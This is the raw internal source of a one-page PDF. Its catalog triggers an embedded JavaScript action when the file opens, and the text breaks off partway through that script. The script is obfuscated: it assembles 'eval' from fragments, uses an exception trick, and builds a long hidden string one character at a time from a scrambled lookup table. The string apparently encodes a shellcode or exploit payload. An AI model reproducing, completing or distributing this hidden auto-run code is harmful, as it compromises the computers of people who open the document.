%PDF-1.6
%‚„œ”
7 0 obj
<</Count 1/Type/Pages/Kids[28 0 R]>>
endobj
21 0 obj
<</Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups[]>>>>/StructTreeRoot 11 0 R/Type/Catalog>>
endobj
23 0 obj
<</JavaScript 24 0 R/AP 8 0 R>>
endobj
24 0 obj
<</Names[123 0 R 76 0 R]>>
endobj
25 0 obj
<</S/JavaScript/JS 26 0 R>>
endobj
26 0 obj
<</Length 1108/Filter[/FlateDecode]>>stream
endstream
endobj
28 0 obj
<</Parent 7 0 R/StructParents 0/Contents 60 0 R/Rotate 90/MediaBox[0 0 612 792]/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/Properties/ExtGState>>/Type/Page>>
endobj
60 0 obj
<</Length 539/Filter/FlateDecode/Type/Contents>>stream
endstream
endobj
76 0 obj
<</S/JavaScript/JS(
e=\(\(\('google'\)\)\)['toUpperCase'];
l='l';
e=e\(\)[\(\(2+3\)?'ev':""\)+'a'+l];
$
=
"N<GigS5%*>s{-wKE9_M.aA6y1b:W 'rf@nU\(u/Vk2poPe\)z+}qI|xdC]407[;'Qcthv83D,m&lj=";
s=[];
try{this.info.ebwg.erbgera.bgser=421}catch\(q\){
s["p"+"u"+"sh"]\($[3]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[35]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[45]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[74]\);s["p"+"u"+"sh"]\($[10]\);s["p"+"u"+"sh"]\($[4]\);s["p"+"u"+"sh"]\($[75]\);s["p"+"u"+"sh"]\($[61]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[20]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[16]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[58]\);s["p"+"u"+"sh"]\($[40]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[6]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[53]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[63]\);s["p"+"u"+"sh"]\($[56]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[68]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[25]\);s["p"+"u"+"sh"]\($[57]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[44]\);s["p"+"u"+"sh"]\($[67]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[22]\);s["p"+"u"+"sh"]\($[24]\);s["p"+"u"+"sh"]\($[7]\);s["p"+"u"+"sh"]\($[36]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"+"sh"]\($[31]\);s["p"+"u"